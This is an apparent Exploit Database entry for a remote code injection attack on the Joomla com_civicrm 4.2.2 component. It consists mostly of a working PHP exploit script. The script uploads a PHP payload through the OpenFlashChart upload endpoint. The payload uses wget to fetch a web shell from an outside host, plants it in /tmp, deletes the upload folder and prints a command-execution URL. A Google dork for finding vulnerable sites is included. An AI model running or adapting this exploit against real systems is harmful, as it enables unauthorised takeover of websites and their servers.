Joomla! Component com_civicrm 4.2.2 – Remote Code Injection

• Exploit Database
• 46 阅读

• 作者： iskorpitx
  日期： 2013-04-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24969/

• # Exploit Title: joomla component com_civicrm remode code injection exploit
  # Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
  # Date: 20/04/2013
  # Exploit Author: iskorpitx
  # Vendor Homepage: http://civicrm.org
  # Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
  # Version: [civicrm 4.2.2]
  # Tested on: Win8 Pro x64 
  # CVE : http://www.securityweb.org
  
  <?php 
  
  # Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote code injection exploit
  # http://www.securityweb.org & http://www.security.biz.tr
  # multithreading mass c:\appserv\www>exp.php -u http://target.com/ -f post.php
  
   
  
  $options = getopt('u:f:'); 
  
  if(!isset($options['u'], $options['f'])) 
  die("\nUsage example: php jnews.php -u http://target.com/ -f post.php\n 
  -u http://target.com/The full path to Joomla! 
  -f post.php The name of the file to create.\n");
  
  $url =$options['u']; 
  $file=$options['f']; 
  
  
  $shell = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}"; 
  $url = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}"; 
  
  
  $data= '<?php 
   system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");
   system("cp post.php ../../../../../../../tmp/post.php");
   system("cd ..; rm -rf tmp-upload-images");
   echo "by iskorpitx" ; 
   fclose ( $handle ); 
   ?>'; 
  $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 
  'Content-Type: text/plain'); 
  
  
  echo "[+] Submitting request to: {$options['u']}\n"; 
  
  
  $handle = curl_init(); 
  
  curl_setopt($handle, CURLOPT_URL, $url); 
  curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); 
  curl_setopt($handle, CURLOPT_POSTFIELDS, $data); 
  curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); 
  
  $source = curl_exec($handle); 
  curl_close($handle); 
  
  
  if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) 
  { 
  echo "[+] Exploit completed successfully!\n"; 
  echo "______________________________________________\n\n{$shell}?cmd=system('id');\n"; 
  } 
  else
  { 
  die("[+] Exploit was unsuccessful.\n"); 
  } 
   
  ?>